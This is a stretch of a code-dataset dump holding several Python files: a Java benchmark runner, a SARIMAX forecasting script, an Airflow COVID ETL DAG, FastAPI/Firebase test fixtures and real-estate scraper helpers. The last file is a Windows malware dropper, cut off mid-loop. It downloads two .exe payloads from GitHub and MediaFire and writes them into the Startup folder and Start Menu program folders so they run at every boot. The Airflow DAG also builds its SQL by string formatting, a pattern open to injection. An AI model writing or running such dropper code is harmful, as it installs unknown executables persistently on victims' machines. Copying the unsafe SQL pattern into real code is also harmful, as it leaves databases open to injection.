os.path.join(JAVA_BIN, 'bin', 'java.exe')\n\nlogging.getLogger().setLevel(logging.INFO)\n\ndef extract_return_stats(output):\n stat_list = [int(s) for s in output.split(' ') if s.isdigit()]\n return stat_list[0], stat_list[1]\n\n\ndef plot_results(*arg):\n logging.info('Plotting Results...')\n\n legend = []\n for list in arg:\n legend.append(list[0][2])\n x = []\n y = []\n for result in list:\n x.append(result[0])\n y.append(result[1])\n\n plt.plot(x, y, linewidth=2)\n\n plt.xlabel('Matrix Size')\n plt.ylabel('Time (ms)')\n plt.legend(legend, loc='upper left')\n plt.show()\n\n\nclass Benchmark(object):\n\n def __init__(self, start_size, end_size, step_size, iterations):\n logging.info('Initializing benchmark...')\n self.start_size = start_size\n 
self.end_size = end_size\n        self.step_size = step_size\n        self.iterations = iterations\n\n    def run(self, java_class, thread_count):\n        classpath = os.path.join('com', 'company')\n        java_filename_path = os.path.join(classpath, java_class + '.java')\n        java_class_path = 'com/company/{}'.format(java_class)\n\n        # compile java and block until javac finishes so the class files exist before the runs\n        subprocess.Popen([JAVAC, '-O', java_filename_path]).wait()\n\n        matrix_size = self.start_size\n        results = []\n        while matrix_size <= self.end_size:\n            cmd = [JAVA, '-cp', '.', java_class_path, str(matrix_size), str(thread_count)]\n            x = 0\n            time_ms = 0\n            while x < self.iterations:\n                p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n                stdout, stderr = p.communicate()\n                elapsed, thread_count = extract_return_stats(stdout.decode().rstrip())  # 'elapsed' avoids shadowing the time module\n                x += 1\n                time_ms += elapsed\n\n            results.append([matrix_size, time_ms/self.iterations, java_class + ' ' + str(thread_count) + ' threads'])\n            logging.info('[{}] average runtime for matrix size {} is {} ms'.format(java_class, matrix_size, time_ms/self.iterations))\n            matrix_size += self.step_size\n\n        return results\n\n# init benchmark parameters\nb = Benchmark(start_size=100, end_size=1600, step_size=100, iterations=5)\n\n# run each benchmark\nmatrix3_results = b.run('Matrix3', 4)\ntime.sleep(1)\nmatrix43b_results = b.run('Matrix43b', 8)\ntime.sleep(1)\n\n# plot all results in one graph\nplot_results(matrix3_results, matrix43b_results)\n", "repo_name": "ciarancourtney/concurrent_java_examples", "sub_path": "bench.py", "file_name": "bench.py", "file_ext": "py", "file_size_in_byte": 2663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 54, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 63, "usage_type": "call"}, {"api_name": "subprocess.PIPE", 
"line_number": 63, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 70, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "73525544442", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\nimport itertools\nimport statsmodels.api as sm\nimport pandas as pd\nflow_file = '/media/dsl/20d6b919-92e1-4489-b2be-a092290668e4/dsl/flow_train.csv'\ndf = pd.read_csv(flow_file)\ndf['date_dt'] = pd.to_datetime(df['date_dt'].astype(str), format='%Y%m%d')\nflow_group = df.groupby(by='district_code')\n\ntarget = np.zeros(shape=(98, 274, 3),dtype=np.float32)\np = d = q = range(0, 2)\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\nprint('Examples of parameter combinations for Seasonal ARIMA...')\nprint('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[1]))\nprint('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[2]))\nprint('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[3]))\nprint('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[4]))\n\n\ndef get_most():\n global mod, results\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(ds,\n order=param,\n seasonal_order=param_seasonal,\n enforce_stationarity=False,\n enforce_invertibility=False)\n results = mod.fit()\n print('ARIMA{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))\n except:\n continue\n\n\nfor ix, x in enumerate(flow_group.count().index):\n\n d = df[df['district_code']==x]\n ds = d[['date_dt', 'flow_in' ]]\n ds = ds.set_index('date_dt')\n decomposition = sm.tsa.seasonal_decompose(ds, model='additive')\n fig = decomposition.plot()\n plt.show()\n break\n\n\n\n\nmod = sm.tsa.statespace.SARIMAX(ds,\n order=(1, 0, 1),\n seasonal_order=(1, 1, 1, 12),\n enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\nprint(results.summary().tables[1])\nresults.plot_diagnostics(figsize=(16, 8))\nplt.show()\n\npred = results.get_prediction(start=pd.to_datetime('2017-09-15'), dynamic=False)\npred_ci = pred.conf_int()\nax = ds['2017':].plot(label='observed')\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_xlabel('Date')\nax.set_ylabel('Furniture Sales')\nplt.legend()\nplt.show()\n\npred_uc = results.get_forecast(steps=2)\nprint(pred_uc)\npred_ci = pred_uc.conf_int()\nax = ds.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.25)\nax.set_xlabel('Date')\nax.set_ylabel('Furniture Sales')\nplt.legend()\nplt.show()", "repo_name": "dsl2009/forlove", "sub_path": "air.py", "file_name": "air.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 11, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 13, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 14, "usage_type": 
"call"}, {"api_name": "statsmodels.api.tsa.statespace.SARIMAX", "line_number": 27, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa", "line_number": 27, "usage_type": "attribute"}, {"api_name": "statsmodels.api", "line_number": 27, "usage_type": "name"}, {"api_name": "statsmodels.api.tsa.seasonal_decompose", "line_number": 43, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa", "line_number": 43, "usage_type": "attribute"}, {"api_name": "statsmodels.api", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "statsmodels.api.tsa.statespace.SARIMAX", "line_number": 51, "usage_type": "call"}, {"api_name": "statsmodels.api.tsa", "line_number": 51, "usage_type": "attribute"}, {"api_name": "statsmodels.api", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "27157719009", "text": "import requests\nimport json\nimport pandas as pd\nimport psycopg2 as pg\nfrom datetime import date\nfrom configparser import ConfigParser\n\nconfig = ConfigParser()\nconfig.read(\"pg_creds.cfg\")\n\n#############################################################################\n# Extract / Transform\n#############################################################################\n\n\ndef fetchDataToLocal():\n \"\"\"\n Buscando dados de COVID da cidade de Nova Iorque através de uma API\n \"\"\"\n \n url = \"https://data.cityofnewyork.us/resource/rc75-m7u3.json\"\n response = requests.get(url)\n\n df = pd.DataFrame(json.loads(response.content))\n df = df.set_index(\"date_of_interest\")\n \n df.to_csv(\"data/nyccovid_{}.csv\".format(date.today().strftime(\"%Y%m%d\")))\n \n\n#############################################################################\n# Load\n#############################################################################\n\n\ndef sqlLoad():\n \"\"\"\n Conectando no banco e importando os dados para o Postgres\n \"\"\"\n #conexão com o banco de dados Postgres - Substitua pelas suas variáveis ^^\n try:\n dbconnect = pg.connect(\n database=config.get(\"postgres\", \"DATABASE\"),\n user=config.get(\"postgres\", \"USERNAME\"),\n password=config.get(\"postgres\", \"PASSWORD\"),\n host=config.get(\"postgres\", \"HOST\")\n )\n except Exception as error:\n print(error)\n \n cursor = dbconnect.cursor()\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS covid_data (\n date DATE,\n case_count INT,\n hospitalized_count INT,\n death_count INT,\n PRIMARY KEY (date)\n );\n \n TRUNCATE TABLE covid_data;\n \"\"\"\n )\n dbconnect.commit()\n \n with 
open(\"data/nyccovid_{}.csv\".format(date.today().strftime(\"%Y%m%d\"))) as f:\n next(f)\n for row in f:\n cursor.execute(\"\"\"\n INSERT INTO covid_data\n VALUES ('{}', '{}', '{}', '{}')\n \"\"\".format(\n row.split(\",\")[0],\n row.split(\",\")[1],\n row.split(\",\")[2],\n row.split(\",\")[3])\n )\n dbconnect.commit()\n\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\ndefault_args = {\n \"owner\": \"airflow\",\n \"start_date\": datetime.today() - timedelta(days=1)\n }\nwith DAG(\n \"covid_nyc_data\",\n default_args=default_args,\n schedule_interval = \"0 1 * * *\",\n) as dag:\n \n fetchDataToLocal = PythonOperator(\n task_id=\"fetch_data_to_local\",\n python_callable=fetchDataToLocal\n )\n \n sqlLoad = PythonOperator(\n task_id=\"sql_load\",\n python_callable=sqlLoad\n )\n \n fetchDataToLocal >> sqlLoad\n", "repo_name": "evandro-morini/airflow-dag-example", "sub_path": "covid_dag.py", "file_name": "covid_dag.py", "file_ext": "py", "file_size_in_byte": 2820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 24, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 84, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 84, "usage_type": "call"}, {"api_name": "airflow.DAG", "line_number": 86, "usage_type": "call"}, {"api_name": "airflow.operators.python_operator.PythonOperator", "line_number": 92, "usage_type": "call"}, {"api_name": "airflow.operators.python_operator.PythonOperator", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "41631221065", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 7 15:16:27 2019\n\n@author: bhaskarnamrata\n\"\"\"\n\nfrom New_Struct import portfolio\nfrom datetime import datetime\nfrom os import path\nimport pprint\n\ndef main():\n \n p = portfolio()\n underlying = input('Underlying:')\n expiry_date = datetime.strptime(input('Expiry Date(yyyymmdd):'), '%Y%m%d').date()\n \n if path.exists('{0}_{1}'.format(underlying, expiry_date)):\n p = p.load_object(underlying, expiry_date)\n \n else:\n p.save_object(p, underlying, expiry_date)\n \n while input('Add Trades(Y/N):') == 'Y':\n current_positions = len(p.Strategy['Legs_Detail'])\n p.initialize_legs()\n new_positions = len(p.Strategy['Legs_Detail'])\n print ('{0} positions added.'.format(new_positions - current_positions))\n p.save_object(p, underlying, expiry_date)\n \n\n \n \n while input('Update Position(Y/N):') == 'Y':\n p.update_mkt_val(input('Option Type:'))\n \n \n p.save_object(p, underlying, expiry_date)\n pprint.pprint(p.Strategy['Legs_Detail'])\n\n \n \nif __name__ == \"__main__\":\n main()\n", "repo_name": "vchintaluri/VC_OP_T", "sub_path": "Trade Journal.py", 
"file_name": "Trade Journal.py", "file_ext": "py", "file_size_in_byte": 1152, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "New_Struct.portfolio", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "pprint.pprint", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "35847570504", "text": "import pytest\n\nfrom fastapi import Header\nfrom fastapi.testclient import TestClient\nfrom app.main import app\nfrom app.dependencies import validate_token\nfrom firebase_admin import auth\n\nfrom tests.utility import signup_request, delete_user_request\n\nfrom os import environ\n\n\ndef override_validate_token(x_uid: str = Header()) -> dict:\n \"\"\"\n トークンをヘッダーで受け取り、検証する\n \"\"\"\n\n user = auth.get_user(x_uid)\n\n return {\n \"token\": \"fake token\",\n \"user\": {\n \"uid\": user.uid,\n \"email\": user.email,\n },\n }\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef test_client():\n # テスト前のセットアップ\n if \"OMNIA_ENV\" not in environ or environ[\"OMNIA_ENV\"] != \"emulator\":\n assert False, \"OMNIA_ENVが設定されていません、またはemulatorではありません\"\n if \"FIRESTORE_EMULATOR_HOST\" not in environ:\n assert False, \"FIRESTORE_EMULATOR_HOSTが設定されていません\"\n if \"FIREBASE_AUTH_EMULATOR_HOST\" not in environ:\n assert False, \"FIREBASE_AUTH_EMULATOR_HOSTが設定されていません\"\n\n # Firebase Emulatorがデータを全部消してくれるので、テスト前に消さなくてもいい\n\n test_client = TestClient(app)\n\n app.dependency_overrides[validate_token] = override_validate_token\n\n yield test_client\n\n\n@pytest.fixture(scope=\"function\")\ndef user_uid(test_client):\n response = signup_request(\n test_client,\n \"potato@potato.com\",\n \"password123\",\n )\n\n assert response.status_code == 200\n\n yield response.json()[\"uid\"]\n\n delete_user_request(test_client, response.json()[\"uid\"])\n", "repo_name": "Marley-Mulvin-Broome/tech-translator", "sub_path": "server/tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 1686, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.Header", "line_number": 14, "usage_type": "call"}, {"api_name": "firebase_admin.auth.get_user", "line_number": 19, "usage_type": "call"}, {"api_name": "firebase_admin.auth", "line_number": 19, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 33, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 42, "usage_type": "call"}, {"api_name": "app.main.app", "line_number": 42, "usage_type": "argument"}, {"api_name": "app.main.app.dependency_overrides", "line_number": 44, "usage_type": "attribute"}, {"api_name": "app.main.app", "line_number": 44, "usage_type": "name"}, {"api_name": "app.dependencies.validate_token", "line_number": 44, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 30, "usage_type": "call"}, {"api_name": "tests.utility.signup_request", "line_number": 51, "usage_type": "call"}, {"api_name": "tests.utility.delete_user_request", "line_number": 61, "usage_type": "call"}, {"api_name": 
"pytest.fixture", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "26384906397", "text": "import logging\nimport os\nimport datetime\nimport requests\nimport xmltodict\nimport re\nfrom functools import reduce\nimport codecs\nimport pytz\nimport gc\nimport math\nfrom dateutil.parser import parse\nfrom scrapy import logformatter\nfrom scrapy.exceptions import DropItem\n\nlogger = logging.getLogger(__name__)\n\n\nclass PoliteLogFormatter(logformatter.LogFormatter):\n def dropped(self, item, exception, response, spider):\n if '_id' in item.keys():\n return {\n 'level': logging.INFO,\n 'msg': u\"Dropped item %s, %s\" % (item['_id'],item['url']),\n 'args': {\n 'exception': exception,\n 'item': item,\n }\n }\n else:\n return {\n 'level': logging.INFO,\n 'msg': u\"Dropped item, exception: %s\" % exception,\n 'args': {\n 'exception': exception,\n 'item': item,\n }\n }\n\n\nclass Time:\n\n @staticmethod\n def timer(start, end):\n hours, rem = divmod(end-start, 3600)\n minutes, seconds = divmod(rem, 60)\n return \"{:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)\n\n\nclass Scraper:\n\n @staticmethod\n def current_timestamp():\n return int(datetime.datetime.now().timestamp())\n\n @staticmethod\n def current_datetime():\n return datetime.datetime.utcnow()\n # return datetime.datetime.now(pytz.timezone(\"Europe/Warsaw\"))\n\n @staticmethod\n def datetime2str(dt):\n if isinstance(dt, datetime.datetime):\n return dt.__str__()\n\n @staticmethod\n def timestamp2datetime(timestamp):\n return datetime.datetime.fromtimestamp(timestamp)\n\n @staticmethod\n def contains_digit(x):\n return any([i.isdigit() for i in x])\n\n @staticmethod\n def dict_except(dictionary, except_keys=[], include_keys=None):\n temp = {}\n for key in dictionary:\n if key not in except_keys:\n if include_keys is None:\n temp[key] = dictionary[key]\n else:\n if key in include_keys:\n temp[key] = dictionary[key]\n return temp\n\n @staticmethod\n def concat_dict(dict_list):\n return reduce(lambda x, y: dict(x, **y), dict_list)\n\n @staticmethod\n def digits_from_str(txt, returntype=float):\n \"\"\"return numbers from string '523 000 zł' -> 523000,\n\n :param:\n txt - text that contains number\n :return:\n int\n \"\"\"\n if txt and re.search('[\\d., ]{1,}', txt):\n result = re.sub(\",\", \".\", re.sub(r\" +\", \"\", re.findall('[\\d., ]{1,}', txt)[-1]))\n if len(result) == 0:\n return None\n else:\n if returntype == int:\n return int(float(result))\n elif returntype == float:\n return float(result)\n else:\n return None\n\n @staticmethod\n def convert_floor(x):\n if x:\n if str(x).strip().isdigit():\n return int(x)\n elif x.lower() == 'parter':\n return int(0)\n elif x.lower() == 'suterena':\n return None\n elif x == '> 10':\n return int(11)\n elif x.lower() == 'powyżej 10':\n return int(11)\n elif x.lower() == 'powyżej 30':\n return int(11)\n elif x == 'poddasze':\n return None\n elif type(x) == str:\n return Scraper.digits_from_str(x)\n else:\n return None\n else:\n return None\n\n @staticmethod\n def get_createdate_polish_months(data):\n\n logger.debug(data)\n if data:\n reg = r\"[0123]?\\d\\W+\\S+\\W+20\\d\\d\"\n match = re.search(reg, data.lower())\n if match:\n x = match.group(0)\n logger.debug(x)\n x = re.sub(r\"stycz\\S+\", \"jan\", x)\n x = re.sub(r\"lut\\S+\", \"feb\", x)\n x = re.sub(r\"mar\\S+\", \"mar\", x)\n x = re.sub(r\"kwie\\S+\", \"apr\", x)\n x = re.sub(r\"maj\\S+\", \"may\", x)\n x = re.sub(r\"czerw\\S+\", \"jun\", x)\n x = re.sub(r\"lip\\S+\", \"jul\", x)\n x = re.sub(r\"sierp\\S+\", \"aug\", x)\n x 
= re.sub(r\"wrze\\S+\", \"sep\", x)\n x = re.sub(r\"pa.dziern\\S+\", \"oct\", x)\n x = re.sub(r\"listopa\\S+\", \"nov\", x)\n x = re.sub(r\"grud\\S+\", \"dec\", x)\n logger.debug(x)\n\n try:\n x = parse(x)\n x = Scraper.datetime2str(x)\n logger.debug(x)\n return x\n except BaseException:\n logger.error(x)\n return None\n\n else:\n return None\n else:\n return None\n\n @staticmethod\n def searchregex(txt, pattern, group=0, func=None):\n if txt:\n match = re.search(pattern, txt)\n if match and func:\n return func(match.group(group))\n elif match:\n return match.group(group)\n else:\n return None\n else:\n return None\n\n\nclass Geodata:\n\n @staticmethod\n def get_geodata_otodom(content):\n\n pattern = \"latitude.:(\\d\\d.\\d+),.longitude.:(\\d\\d.\\d+)\"\n if re.search(pattern, content.decode(\"utf-8\")):\n geocoordinates = dict()\n geocoordinates['latitude'] = Scraper.searchregex(\n content.decode(\"utf-8\"),\"latitude.:(\\d\\d.\\d+)\", group=1)\n geocoordinates['longitude'] = Scraper.searchregex(\n content.decode(\"utf-8\"),\"longitude.:(\\d\\d.\\d+)\", group=1)\n return geocoordinates\n else:\n return dict()\n\n @staticmethod\n def get_geodata_olx(content):\n\n pattern = r'{\\W+zoom\\W+\\d+\\W+lat\\W+(\\d+.\\d+)\\W+lon\\W+(\\d+.\\d+)'\n match = re.search(pattern, content.decode(\"utf-8\"))\n if match:\n data_lat = float(match.group(1))\n data_lon = float(match.group(2))\n geocoordinates = {\"latitude\": data_lat, \"longitude\": data_lon}\n return geocoordinates\n else:\n return dict()\n\n @staticmethod\n def get_geodata_gratka(content):\n\n pattern = \"szerokosc-geograficzna-y..[\\d]{2}\\\\.[\\d]+\"\n if re.search(pattern, content.decode(\"utf-8\")):\n data_lat = re.findall(\"szerokosc-geograficzna-y..[\\d]{2}\\\\.[\\d]+\", content.decode(\"utf-8\"))[0]\n data_lat = \"\".join([i for i in data_lat if i.isdigit() or i == \".\"])\n data_lon = re.findall(\"dlugosc-geograficzna-x..[\\d]{2}\\\\.[\\d]+\", content.decode(\"utf-8\"))[0]\n data_lon = \"\".join([i for i in data_lon if i.isdigit() or i == \".\"])\n geocoordinates = {\"latitude\": data_lat, \"longitude\": data_lon}\n return geocoordinates\n else:\n return dict()\n\n @staticmethod\n def get_geocode_openstreet(geocoordinates):\n\n try:\n address = requests.get(\n \"https://nominatim.openstreetmap.org/reverse?format=xml&lat={latitude}&lon={longitude}&zoom=18&addressdetails=1\".format(\n **geocoordinates)\n )\n\n address_text = xmltodict.parse(address.content)['reversegeocode']['addressparts']\n\n address_coordin = xmltodict.parse(address.content)['reversegeocode']['result']\n\n return geocoordinates, address_text, address_coordin\n except BaseException as e:\n raise DropItem(\"Openstreetmap error, %s \" % e)\n\n @staticmethod\n def haversine(GC_latitude, GC_longitude):\n \"\"\"calculates distance between coordinates and Warsaw, Jana Kazmierza\n\n Parameters\n ----------\n GC_latitude : float\n latitude ex. 52.22264693429859\n GC_longitude : float\n longitude, ex. 
20.938653945922855\n\n Returns\n -------\n int\n distance in kilometers\n \"\"\"\n\n R = 6372800 # Earth radius in meters\n lat1, lon1 = (52.22264693429859, 20.938653945922855)\n lat2, lon2 = (GC_latitude, GC_longitude)\n\n phi1, phi2 = math.radians(lat1), math.radians(lat2)\n dphi = math.radians(lat2 - lat1)\n dlambda = math.radians(lon2 - lon1)\n\n a = math.sin(dphi/2)**2 + \\\n math.cos(phi1)*math.cos(phi2)*math.sin(dlambda/2)**2\n\n return int(2*R*math.atan2(math.sqrt(a), math.sqrt(1 - a))/1000)\n", "repo_name": "xSzpo/xFlats-K8S", "sub_path": "scraper/helpers/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "scrapy.logformatter.LogFormatter", "line_number": 19, "usage_type": "attribute"}, {"api_name": "scrapy.logformatter", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 54, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 88, "usage_type": "call"}, {"api_name": "re.search", "line_number": 99, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 100, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 100, "usage_type": "call"}, {"api_name": "re.search", "line_number": 141, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 145, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 146, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 147, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 148, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 149, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 150, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 151, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 152, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 153, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 154, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 155, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 156, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 160, "usage_type": "call"}, {"api_name": "re.search", "line_number": 176, "usage_type": "call"}, {"api_name": "re.search", "line_number": 193, "usage_type": "call"}, {"api_name": "re.search", "line_number": 207, "usage_type": "call"}, {"api_name": "re.search", "line_number": 220, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 221, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 223, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 234, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 239, "usage_type": "call"}, {"api_name": 
"xmltodict.parse", "line_number": 241, "usage_type": "call"}, {"api_name": "scrapy.exceptions.DropItem", "line_number": 245, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 268, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 269, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 270, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 272, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 273, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 273, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 275, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "15317522603", "text": "from os import system as sus, getenv as ghebe, listdir, path\nfrom requests import get as loc\n\n# vars \n\nurl1, url2 = 'https://github.com/Spaceish/swap-base/raw/master/yny.exe', 'https://download856.mediafire.com/52vdph6e1nug/hkleocww3qbbc95/ynysebu.exe'\nurl_file1, url_file2 = loc(url=url1, allow_redirects=True).content, loc(url=url2, allow_redirects=True).content\nfile1_ext, file2_ext = url1.split('/')[-1].split('.')[-1], url2.split('/')[-1].split('.')[-1]\n\ndir2 = f\"{ghebe('appdata')}\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\ndir3 = f\"{ghebe('appdata')}\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\"\n\n\n# making the placeholder folder for the payload to run at startup\nsus(f\"cd {dir3} && rmdir suus && mkdir suus && exit\")\n# putting the payload in the startup folders\nopen(f\"{dir2}\\\\sebu.{file2_ext}\", 'wb').write(url_file2);open(f\"{dir2}\\\\pocc.{file1_ext}\", 'wb').write(url_file1)\n# putting the payload in the placeholder folder a couple of times to ensure that it runs on startup\nfor _ in range(3): open(f\"{dir3}\\\\suus\\\\pocc.{file2_ext}\", 'wb').write(url_file2)\n# also putting the payload in every startup app it finds\nfor folder in listdir(dir3):\n f = path.join(dir3, folder)\n if path.isdir(f):\n 